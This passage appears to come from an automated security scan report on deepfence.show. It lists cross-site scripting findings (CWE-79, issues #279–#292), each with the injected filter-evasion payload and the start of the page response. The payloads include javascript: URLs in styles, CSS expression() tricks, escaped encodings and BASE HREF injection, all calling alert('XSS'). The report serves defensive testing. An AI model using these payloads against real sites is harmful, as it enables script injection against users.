href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #279\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# echoed back in the response\nCWE-ID CWE-79\nIssue Number #280\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <DIV STYLE=\"background-image: url(javascript:alert('XSS'\n))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #281\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\\n0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\\n006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\\n0029\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #282\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <DIV STYLE=\"background-image: url(&#1;javascript:alert('\nXSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #283Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <DIV STYLE=\"width: expression(alert('XSS'));\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #284\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #285\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #286\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# <XSS STYLE=\"xss:expression(alert('XSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #287\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:&#101;x&#x2F;*XSS\n*//*/*/pression(alert(\"XSS\"))'>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #288\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #289\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\")\n;}</STYLE><A CLASS=XSS></A>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #290\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE type=\"text/css\">BODY{background:url(\"javascript:\nalert('XSS')\")}</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the responseCWE-ID CWE-79\nIssue Number #291\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #292\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <BASE HREF=\"javascript:alert('XSS');//\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 